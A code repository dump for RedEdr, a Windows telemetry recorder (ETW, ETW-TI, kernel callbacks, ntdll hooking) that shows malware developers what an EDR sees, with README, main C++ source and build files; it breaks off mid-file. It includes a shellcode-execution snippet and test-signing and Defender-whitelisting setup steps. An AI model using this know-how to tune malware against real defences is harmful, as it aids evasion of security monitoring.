<https://www.gnu.org/licenses/why-not-lgpl.html>.


================================================
FILE: README.md
================================================
# RedEdr

Display events from Windows to see the detection surface of your malware. Same data as an ETW-based EDR sees (Defender, Elastic, Fibratus...). 

* Identify the telemetry your malware generates (detection surface)
* Verify your anti-EDR techniques work
* Debug and analyze your malware

It generates [JSON files](https://github.com/dobin/RedEdr/tree/master/Data)
collecting [the telemetry](https://github.com/dobin/RedEdr/blob/master/Doc/captured_events.md) 
of your RedTeaming tools. 

It is now part of Detonator, see [detonator.r00ted.ch](https://detonator.r00ted.ch). 


## Screenshots

Shellcode execution:
```c
	PVOID shellcodeAddr = VirtualAlloc(NULL, payloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	memcpy(shellcodeAddr, payload, payloadSize);
	VirtualProtect(shellcodeAddr, payloadSize, PAGE_EXECUTE_READWRITE, &dwOldProtection));
	HANDLE hThread = CreateThread(NULL, 0, shellcodeAddr, shellcodeAddr, 0, &threadId);
```

With ntdll.dll hooking:
![RedEdr Screenshot ntdll.dll hooking](https://raw.github.com/dobin/RedEdr/master/Doc/screenshot-web-rwx-dll.png)


ETW events:
![RedEdr Screenshot ETW](https://raw.github.com/dobin/RedEdr/master/Doc/screenshot-web-rwx-etw.png)


## Implemented Telemetry Consumers

* ETW
  * Microsoft-Windows-Kernel-Process
  * Microsoft-Windows-Kernel-Audit-API-Calls
  * Microsoft-Windows-Security-Auditing
  * Defender
    * Microsoft-Antimalware-Engine
    * Microsoft-Antimalware-RTP
    * Microsoft-Antimalware-AMFilter
    * Microsoft-Antimalware-Scan-Interface
    * Microsoft-Antimalware-Protection
  * ETW-TI (Threat Intelligence) with a PPL service via ELAM driver

* Kernel Callbacks
  * PsSetCreateProcessNotifyRoutine
  * PsSetCreateThreadNotifyRoutine
  * PsSetLoadImageNotifyRoutine
  * (ObRegisterCallbacks, not used atm)

* ntdll.dll hooking 

* Callstacks
  * On ntdll.dll hook invocation
  * On several ETW events
 
* process query
  * PEB
  * Loaded DLL's (and their regions)


## Installation

Use a dedicated VM for RedEdr. 

Extract release.zip into `C:\RedEdr`. **No other directories are supported.**

Whitelist `C:\RedEdr\RedEdr.exe` in your AV (Defender).

Start terminal as local admin.

Change into `C:\RedEdr` and run `.\RedEdr.exe`:
```
PS C:\rededr> .\RedEdr.exe
Maldev event recorder
Usage:
  RedEdr [OPTION...]
  -t, --trace arg     Process name to trace
  -e, --etw           Input: Consume ETW Events
  -g, --etwti         Input: Consume ETW-TI Events
  -m, --mplog         Input: Consume Defender mplog file
  -k, --kernel        Input: Consume kernel callback events
  -i, --inject        Input: Consume DLL injection
  -w, --web           Output: Web server
...
```

Try: `.\RedEdr.exe --etw --trace otepad`, and then start notepad 
(will be `notepad.exe` on Windows 10, `Notepad.exe` on Windows 11).
The log should be printed as stdout.


## Simple ETW Usage

RedEdr will trace all processes containing by process image name (exe path).

Capture ETW events and provide a web interface on [http://localhost:8081](http://localhost:8081):
```
PS > .\RedEdr.exe --etw --web --trace notepad.exe
```


## Advanced Usage

For ntdll.dll hooking and ETW-TI, we need to configure windows so it can
load our kernel module. 

Change Windows boot options to enable self-signed kernel drivers and reboot.

In admin cmd:
```
PS > bcdedit /set testsigning on
PS > bcdedit -debug on
PS > shutdown /r /t 0
```

If you use Hyper-V, uncheck "Security -> Enable Secure Boot". 


### ETW-TI

ETW-TI requires an ELAM driver to start `RedEdrPplService`, 
and therefore requires self signed kernel driver option.
Make a snapshot of your VM before doing this. Currently its 
not possible to remove the PPL service ever again. 

```
PS > .\RedEdr.exe --etw --etwti --trace notepad.exe
```

If you want ETW Microsoft-Windows-Security-Auditing, start as SYSTEM (`psexec -i -s cmd.exe`). 

See `gpedit.msc -> Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> System Audit Policies - Local Group Policy object`
for settings to log.


### ntdll.dll hooking

KAPC DLL injection for ntdll.dll hooking. Thats what many older EDR's depend on. 
Also requires our own kernel module. 

```
PS > .\RedEdr.exe --hook --trace notepad.exe
```



## EDR Introspection (for Defender)

The following is useful to reverse engineer EDR's, and to verify your anti-EDR techniques
are targeted. It will observe Defender EDR. 

For more details, see Levi's blog at [My Hacker Blog](https://blog.levi.wiki/), 
and the [EDR-Introspection](https://github.com/cailllev/EDR-Introspection) project. 


### Microsoft-Antimalware-Engine ETW events

Argument: `--with-antimalwareengine`

Example: `.\RedEdr.exe --etw --trace putty --web --with-antimalwareengine`

This will collect `Microsoft-Antimalware-Engine` events related to the target process. 
See blog post [Defender Telemetry](https://blog.deeb.ch/posts/defender-telemetry/) for an overview of available events. 

For example the "Behavior Monitoring BmProcessContextStart", which indicates Defender will start behavior monitoring on the targeted process:
```
Behavior Monitoring BmProcessContextStart etw etw_event_id:0x6D etw_pid:0x1524 etw_process:MsMpEng.exe etw_provider_name:Microsoft-Antimalware-Engine etw_tid:0x37A8 etw_time:0x1DCC98C2B514B90 id:0x3 trace_id:0x29
imagepath:\Device\HarddiskVolume6\toolz\putty.exe pid:0x11F48 processcontextid:0x188F7789520
```


### MsMpEng.exe ETW events

Argument: `--with-defendertrace`

Example: `.\RedEdr.exe --etw --etwti --trace putty --web --with-defendertrace`

This will collect `msmpeng.exe` ETW events related to our target process. 
See blog post [Windows Telemetry](https://blog.deeb.ch/posts/windows-telemetry/) for an overview of available events. 

For example "Info" ETW event of "Microsoft-Windows-Kernel-Audit-API-Calls" accessing our target process:
```
Info etw etw_event_id:0x6 etw_pid:0x1524 etw_process:MsMpEng.exe etw_provider_name:Microsoft-Windows-Kernel-Audit-API-Calls etw_tid:0x21E0 etw_time:0x1DCC9BA7177FD80 id:0x1 trace_id:0x29
desiredaccess:0x1FFFFF returncode:0x0 targetprocessid:0x1524 targetthreatid:0x21E0
```


## Example Output

See `Data/` directory:
* [Data](https://github.com/dobin/RedEdr/tree/master/Data)


## Hacking

Arch:
```
      ┌─────┐  ┌────────┐ ┌─────────┐  ┌──────┐                            
      │ ETW │  │ ETW-TI │ │ Kernel  │  │ DLL  │                            
      └──┬──┘  └───┬────┘ └────┬────┘  └──┬───┘                            
         │         │           │          │                                
         └─────────┴─────────┬─┴──────────┘                                
                             │                                             
                             │                                             
                             ▼                                             
                     ┌────────────────┐                                    
                     │                │                                    
Event as JSON string │  Event         │                                    
                     │  Aggregator    │                                    
                     │                │               ┌──────────┐         
                     └───────┬────────┘               │ Process  │         
                             │                        └──────────┘         
                             │                             ▲               
                             ▼                             │query          
                     ┌────────────────┐                    │               
                     │                │         ┌──────────┴────┐          
Event as JSON in C++ │  Event         ├────────►│ Process Query │          
                     │  Processor     │         └─────────────┬─┘          
                     │                │                       │add         
                     └┬───────────────┘                       ▼            
                      │                                    ┌──────────────┐
                      │ ┌────────────────────────┐query    │              │
                      ├─┤Event Augment           ├────────►┤  Mem Static  │
                      │ └────────────────────────┘         │              │
                      │ ┌────────────────────────┐add      └──────────────┘
                      ├─┤Event Mem Tracker       ├──────┐                  
                      │ └────────────────────────┘      │  ┌──────────────┐
                      │ ┌────────────────────────┐query └─►│              │
                      ├─┤Event Detection         ├───┐     │ Mem Dynamic  │
                      │ └────────────────────────┘   └────►│              │
                      ▼ ┌────────────────────────┐         └──────────────┘
                      └─┤Event Storage & Output  │                         
                        └────────────────────────┘                         
```

IPC:
```
  RedEdr.exe                                                                                       
┌────────────┐                    ┌─────────────────┐                                             
│            │   KERNEL_PIPE      │                 │    KERNEL_PIPE: Events (wchar)              
│            │◄───────────────────┤   Kernel Module │                                             
│ Pipe Server│                    │                 │    IOCTL: Config (MY_DRIVER_DATA):          
│            ├───────────────────►│                 │             filename                        
│            │   IOCTL            └─────────────────┘             enable                          
│            │                                                                                    
│            │                                                                                    
│            │                                                                                    
│            │                                                                                    
│            │                    ┌─────────────────┐                                             
│            │   DLL_PIPE         │                 │  DLL_PIPE: 1: Config (wchar)   RedEdr -> DLL
│ Pipe Server│◄───────────────────┤  Injected DLL   │                 "callstack:1;"              
│            │                    │                 │                                             
│            │                    │                 │           >1: Events (wchar)   RedEdr <- DLL
│            │                    └─────────────────┘                                             
│            │                                                                                    
│            │                                                                                    
│            │                                                                                    
│            │                    ┌─────────────────┐                                             
│            │   PPL_PIPE         │                 │  DLL_PIPE: Events (wchar)                   
│ Pipe Server│◄───────────────────┤  ETW-TI Service │                                             
│            │                    │  PPL            │                                             
│            │   SERVICE_PIPE     │                 │  SERVICE_PIPE: Config (wchar)               
│ Pipe Client├───────────────────►│                 │                  "start:<process name>"     
│            │                    └─────────────────┘                                             
│            │                                                                                    
│            │                    ┌─────────────────┐                                             
│            │◄───────────────────┤                 │                                             
│            │                    │  ETW            │                                             
│            │                    │                 │                                             
│            │                    │                 │                                             
│            │                    └─────────────────┘                                             
│            │                                                                                    
│            │                                                                                    
└────────────┘                                                                                    
```


## Compiling 

Good luck.

Use VS2022. Compile as DEBUG.

To compile the kernel driver: 
* Install WDK (+SDK): https://learn.microsoft.com/en-us/windows-hardware/drivers/download-the-wdk

It should deploy everything into `C:\RedEdr\`.

On command line, use Visual Studio developer console. 

Everything:
```
repos\RedEdr>msbuild RedEdr.sln /p:Configuration=Debug /p:Platform=x64
```

RedEdr only:
```
repos\RedEdr>msbuild RedEdr.sln /p:Configuration=Debug /p:Platform=x64 /t:RedEdr
```


## Based on

Based on MyDumbEdr
* GPLv3
* https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/
* https://github.com/sensepost/mydumbedr
* patched https://github.com/dobin/mydumbedr
* which seems to use: https://github.com/CCob/SylantStrike/tree/master/SylantStrike

With KAPC injection from:
* https://github.com/0xOvid/RootkitDiaries/
* No license

To run as PPL: 
* https://github.com/pathtofile/PPLRunner/
* No license


## Libraries used

* https://github.com/jarro2783/cxxopts, MIT
* https://github.com/yhirose/cpp-httplib, MIT
* https://github.com/nlohmann/json, MIT


================================================
FILE: RedEdr/RedEdr.cpp
================================================

#include <windows.h>
#include <iostream>
#include <vector>

#include "logging.h"
#include "manager.h"
#include "cxxops.hpp"
#include "config.h"
#include "event_processor.h"
#include "webserver.h"
#include "kernelinterface.h"
#include "pplmanager.h"
#include "process_query.h"
#include "privileges.h"

#include "../Shared/common.h"


/* RedEdr.c: Main file
 *   Parse args
 *   Set flags in the Config object
 *   Init necessary things
 *   Start all threads (mostly through Manager)
 *   Wait for threads to exit
 */


BOOL WINAPI ConsoleCtrlHandler(DWORD ctrlType) {
    switch (ctrlType) {
    case CTRL_C_EVENT:
    case CTRL_CLOSE_EVENT:
    case CTRL_BREAK_EVENT:
    case CTRL_LOGOFF_EVENT:
    case CTRL_SHUTDOWN_EVENT:
        LOG_A(LOG_WARNING, "\nRedEdr: Ctrl-c detected, performing shutdown");
        ManagerShutdown();
        return TRUE; // Indicate that we handled the signal
    default:
        return FALSE; // Let the next handler handle the signal
    }
}


void CreateRequiredFiles() {
    LPCWSTR dir = L"c:\\rededr\\data";
    DWORD fileAttributes = GetFileAttributes(dir);
    if (fileAttributes == INVALID_FILE_ATTRIBUTES || !(fileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
        std::cout << "Directory does not exist. Creating it...\n";
        if (! CreateDirectory(dir, NULL)) {
            std::cerr << "Failed to create directory. Error: " << GetLastError() << "\n";
        }
    }
}


int main(int argc, char* argv[]) {
    cxxopts::Options options("RedEdr", "Maldev event recorder");
    options.add_options()
        // Input
        ("trace", "Input: Process name to observe", cxxopts::value<std::string>()->default_value("malware"))
        ("etw", "Input: Consume ETW Events", cxxopts::value<bool>()->default_value("false"))
        ("etwti", "Input: Consume ETW-TI Events", cxxopts::value<bool>()->default_value("false"))
        ("kernel", "Input: Enable kernel module", cxxopts::value<bool>()->default_value("false"))
        ("hook", "Input: DLL injection/hooking", cxxopts::value<bool>()->default_value("false"))

        // Input options
        ("with-defendertrace", "Input option Defender: Add MsMpEng.exe as target process", cxxopts::value<bool>()->default_value("false"))
        ("with-antimalwareengine", "Input option Defender: Grab ETW events of Microsoft-Antimalware-Engine (related to target process)", cxxopts::value<bool>()->default_value("false"))

        // Output
        ("web", "Output: Web server", cxxopts::value<bool>()->default_value("true"))
		("port", "Output: Web server port", cxxopts::value<int>()->default_value("8081"))
        ("show", "Output: Show messages on stdout", cxxopts::value<bool>()->default_value("false"))

        // Debug
        ("dllreader", "Debug: DLL reader but no injection (for manual injection tests)", cxxopts::value<bool>()->default_value("false"))
        ("krnload", "Debug: Kernel Module Load", cxxopts::value<bool>()->default_value("false"))
        ("krnunload", "Debug: Kernel Module Unload", cxxopts::value<bool>()->default_value("false"))
        ("pplstart", "Debug: PPL service load", cxxopts::value<bool>()->default_value("false"))
        ("pplstop", "Debug: PPL service stop", cxxopts::value<bool>()->default_value("false"))

        ("d,debug", "Debug: Enable debug output", cxxopts::value<bool>()->default_value("false"))
        ("h,help", "Print usage")
        ;
    options.allow_unrecognised_options();
    auto result = options.parse(argc, argv);

    if (result.count("help") || result.unmatched().size() > 0) {
        printf("Unrecognized argument\n");
        std::cout << options.help() << std::endl;
        exit(0);
    }

    // First some debug things
    if (result.count("krnload")) {
        LoadKernelDriver();
        exit(0);
    } else if (result.count("krnunload")) {
        UnloadKernelDriver();
        exit(0);
    }
    else if (result.count("pplstart")) {
        InstallElamCertPpl();
        InstallPplService();
        exit(0);
    }
    else if (result.count("pplstop")) {
        // Instruct PPL service to exit itself (cant do it otherwise)
        // Note: we can replace the exe and start it again
        ConnectPplService();
        ShutdownPplService();
        exit(0);
    }

    // Store args in config
    if (result.count("trace")) {
        std::string traceTarget = result["trace"].as<std::string>();
        g_Config.targetProcessNames = {traceTarget};
        // ManagerApplyNewTargets(g_Config.targetProcessNames); // no need here?
    }
	int port = result["port"].as<int>();
    g_Config.do_etw = result["etw"].as<bool>();
    g_Config.do_etwti = result["etwti"].as<bool>();
    if (g_Config.do_etwti) g_Config.do_kernel = true; // it works better with kernel support
    g_Config.do_kernel = result["kernel"].as<bool>();
	g_Config.do_hook = result["hook"].as<bool>();
    if (g_Config.do_hook) g_Config.do_kernel = true; // hook always requires kernel module
    g_Config.debug_dllreader = result["dllreader"].as<bool>();
    g_Config.hide_full_output = ! result["show"].as<bool>();
    g_Config.web_output = result["web"].as<bool>();
	g_Config.do_defendertrace = result["with-defendertrace"].as<bool>();
	g_Config.do_antimalwareengine = result["with-antimalwareengine"].as<bool>();

    if (g_Config.do_antimalwareengine && !g_Config.do_etw) {
        LOG_A(LOG_WARNING, "Config: --with-antimalwareengine has no effect without --etw");
        return 1;
    }

    if (!g_Config.do_etw && !g_Config.do_kernel && !g_Config.do_etwti && !g_Config.debug_dllreader) {
        printf("Choose at least one of --etw / --etwti / --hook");
        return 1;
    }

    CreateRequiredFiles();
    InitProcessQuery();
    g_EventProcessor.init(); // we also do it in constructor, but wont have g_Config

    // All threads of all *Reader subsystems
    std::vector<HANDLE> threads;
    LOG_A(LOG_INFO, "RedEdr %s", REDEDR_VERSION);
    if (!g_Config.targetProcessNames.empty()) {
        std::string targets = "";
        for (size_t i = 0; i < g_Config.targetProcessNames.size(); ++i) {
            if (i > 0) targets += ", ";
            targets += g_Config.targetProcessNames[i];
        }
        LOG_A(LOG_INFO, "Config: tracing process(es): \"%s\"", targets.c_str());
    } else {
        LOG_A(LOG_INFO, "Config: no targets configured");
    }

    // SeDebug
    if (!PermissionMakeMeDebug()) {
        LOG_A(LOG_ERROR, "RedEdr: Permission error - Did you start with local admin?");
        return 1;
    }
    if (!RunsAsSystem()) {
        LOG_A(LOG_WARNING, "RedEdr Permissions: Not running as SYSTEM, some ETW data is not available");
    }

    // Ctrl+C
    if (!SetConsoleCtrlHandler(ConsoleCtrlHandler, TRUE)) {
        LOG_A(LOG_ERROR, "RedEdr: Failed to set control handler");
        return 1;
    }

    // Functionality
    ManagerStart(threads);
    InitializeEventProcessor(threads);

    // Webserver - boot it last
    if (g_Config.web_output) {
        InitializeWebServer(threads, port);
    }

    // Wait for all threads to complete
    //LOG_A(LOG_INFO, "RedEdr: All started, waiting for %llu threads to exit", threads.size());
    //if (threads.empty()) {
    //    LOG_A(LOG_WARNING, "RedEdr: No threads to wait for");
    //    return 0;
    //}
    
    // Log which threads we're waiting for
    //LOG_A(LOG_INFO, "RedEdr: Thread handles being tracked:");
    for (size_t i = 0; i < threads.size(); i++) {
        LOG_A(LOG_DEBUG, "Track Thread %zu (handle 0x%p)", i, threads[i]);
    }

    // Wait for all threads to complete
    LOG_A(LOG_INFO, "RedEdr: All started, ready");
    DWORD res = WaitForMultipleObjects((DWORD)threads.size(), threads.data(), TRUE, INFINITE);
    if (res == WAIT_FAILED) {
        LOG_A(LOG_ERROR, "RedEdr: Wait failed");
    }
    LOG_A(LOG_INFO, "RedEdr: all %llu threads finished", threads.size());

    
    // Clean up thread handles
    for (HANDLE thread : threads) {
        CloseHandle(thread);
    }
    
    return 0;
}

================================================
FILE: RedEdr/RedEdr.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup Label="ProjectConfigurations">
    <ProjectConfiguration Include="Debug|Win32">
      <Configuration>Debug</Configuration>
      <Platform>Win32</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Release|Win32">
      <Configuration>Release</Configuration>
      <Platform>Win32</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Debug|x64">
      <Configuration>Debug</Configuration>
      <Platform>x64</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Release|x64">
      <Configuration>Release</Configuration>
      <Platform>x64</Platform>
    </ProjectConfiguration>
  </ItemGroup>
  <PropertyGroup Label="Globals">
    <VCProjectVersion>16.0</VCProjectVersion>
    <Keyword>Win32Proj</Keyword>
    <ProjectGuid>{d4ab9b77-7a7b-45e8-8bdc-ac958edb1372}</ProjectGuid>
    <RootNamespace>RedEdr</RootNamespace>
    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <PlatformToolset>v143</PlatformToolset>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
    <PlatformToolset>v143</PlatformToolset>
    <WholeProgramOptimization>true</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <PlatformToolset>v143</PlatformToolset>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
    <PlatformToolset>v143</PlatformToolset>
    <WholeProgramOptimization>true</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
  <ImportGroup Label="ExtensionSettings">
  </ImportGroup>
  <ImportGroup Label="Shared">
  </ImportGroup>
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <PropertyGroup Label="UserMacros" />
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <OutDir>C:\RedEdr\</OutDir>
    <CopyLocalDeploymentContent>true</CopyLocalDeploymentContent>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <OutDir>C:\RedEdr\</OutDir>
    <CopyLocalDeploymentContent>true</CopyLocalDeploymentContent>
  </PropertyGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <FunctionLevelLinking>true</FunctionLevelLinking>
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>_DEBUG;_CONSOLE;OUTPUT_STDOUT;WIN32_LEAN_AND_MEAN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
      <AdditionalIncludeDirectories>$(SolutionDir)RedEdrShared/;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
      <LanguageStandard>stdcpp17</LanguageStandard>
      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
      <AdditionalDependencies>Wtsapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
    </Link>
    <PostBuildEvent>
      <Command>powershell -ep bypass -f "$(SolutionDir)sign_file.ps1" "$(SolutionDir)rededr_ppl.pfx" "$(TargetDir)$(TargetFileName)"</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <FunctionLevelLinking>true</FunctionLevelLinking>
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>UNICODE;_UNICODE;NDEBUG;_CONSOLE;OUTPUT_STDOUT;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
      <AdditionalIncludeDirectories>$(SolutionDir)RedEdrShared;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
      <LanguageStandard>stdcpp17</LanguageStandard>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
      <GenerateDebugInformation>true</GenerateDebugInformation>
      <AdditionalDependencies>Wtsapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
    </Link>
  </ItemDefinitionGroup>
  <ItemGroup>
    <ClCompile Include="..\RedEdrShared\etw_krabs.cpp" />
    <ClCompile Include="..\RedEdrShared\loguru.cpp" />
    <ClCompile Include="..\RedEdrShared\piping.cpp" />
    <ClCompile Include="..\RedEdrShared\myprocess.cpp" />
    <ClCompile Include="..\RedEdrShared\process_mem_static.cpp" />
    <ClCompile Include="..\RedEdrShared\process_resolver.cpp" />
    <ClCompile Include="..\RedEdrShared\process_query.cpp" />
    <ClCompile Include="..\RedEdrShared\utils.cpp" />
    <ClCompile Include="event_aggregator.cpp" />
    <ClCompile Include="event_augmenter.cpp" />
    <ClCompile Include="event_processor.cpp" />
    <ClCompile Include="logging.cpp" />
    <ClCompile Include="manager.cpp" />
    <ClCompile Include="config.cpp" />
    <ClCompile Include="dllinjector.cpp" />
    <ClCompile Include="kernelinterface.cpp" />
    <ClCompile Include="etwreader.cpp" />
    <ClCompile Include="dllreader.cpp" />
    <ClCompile Include="kernelreader.cpp" />
    <ClCompile Include="logreader.cpp" />
    <ClCompile Include="pplmanager.cpp" />
    <ClCompile Include="pplreader.cpp" />
    <ClCompile Include="privileges.cpp" />
    <ClCompile Include="RedEdr.cpp" />
    <ClCompile Include="serviceutils.cpp" />
    <ClCompile Include="webserver.cpp" />
  </ItemGroup>
  <ItemGroup>
    <ClInclude Include="loguru.hpp" />
    <ClInclude Include="event_aggregator.h" />
    <ClInclude Include="event_augmenter.h" />
    <ClInclude Include="event_processor.h" />
    <ClInclude Include="jsonw.hpp" />
    <ClInclude Include="logging.h" />
    <ClInclude Include="manager.h" />
    <ClInclude Include="config.h" />
    <ClInclude Include="cxxops.hpp" />
    <ClInclude Include="dllinjector.h" />
    <ClInclude Include="kernelinterface.h" />
    <ClInclude Include="etwreader.h" />
    <ClInclude Include="httplib.h" />
    <ClInclude Include="dllreader.h" />
    <ClInclude Include="kernelreader.h" />
    <ClInclude Include="logreader.h" />
    <ClInclude Include="pplmanager.h" />
    <ClInclude Include="pplreader.h" />
    <ClInclude Include="privileges.h" />
    <ClInclude Include="serviceutils.h" />
    <ClInclude Include="webserver.h" />
  </ItemGroup>
  <ItemGroup>
    <Text Include="index.html">
      <DeploymentContent Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</DeploymentContent>
    </Text>
  </ItemGroup>
  <ItemGroup>
    <None Include="design.css">
      <DeploymentContent Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</DeploymentContent>
    </None>
    <None Include="packages.config" />
    <None Include="shared.js">
      <DeploymentContent Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</DeploymentContent>
    </None>
  </ItemGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
  <ImportGroup Label="ExtensionTargets">
    <Import Project="..\packages\Microsoft.O365.Security.Krabsetw.4.4.3\build\native\Microsoft.O365.Security.Krabsetw.targets" Condition="Exists('..\packages\Microsoft.O365.Security.Krabsetw.4.4.3\build\native\Microsoft.O365.Security.Krabsetw.targets')" />
  </ImportGroup>
  <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
    <PropertyGroup>
      <ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them.  For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
    </PropertyGroup>
    <Error Condition="!Exists('..\packages\Microsoft.O365.Security.Krabsetw.4.4.3\build\native\Microsoft.O365.Security.Krabsetw.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Microsoft.O365.Security.Krabsetw.4.4.3\build\native\Microsoft.O365.Security.Krabsetw.targets'))" />
  </Target>
</Project>

================================================
FILE: RedEdr/RedEdr.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup>
    <Filter Include="Source Files">
      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
    </Filter>
    <Filter Include="Header Files">
      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
    </Filter>
    <Filter Include="Resource Files">
      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
    </Filter>
    <Filter Include="Source Files\input">
      <UniqueIdentifier>{729c11c2-6cba-4b6a-b0bc-56d18a3f3dfd}</UniqueIdentifier>
    </Filter>
    <Filter Include="Source Files\web">
      <UniqueIdentifier>{81c69665-cc45-4ca7-b535-9be661578dff}</UniqueIdentifier>
    </Filter>
    <Filter Include="Header Files\input">
      <UniqueIdentifier>{71afe3f2-d067-4212-afab-cd324e6885df}</UniqueIdentifier>
    </Filter>
    <Filter Include="Source Files\process">
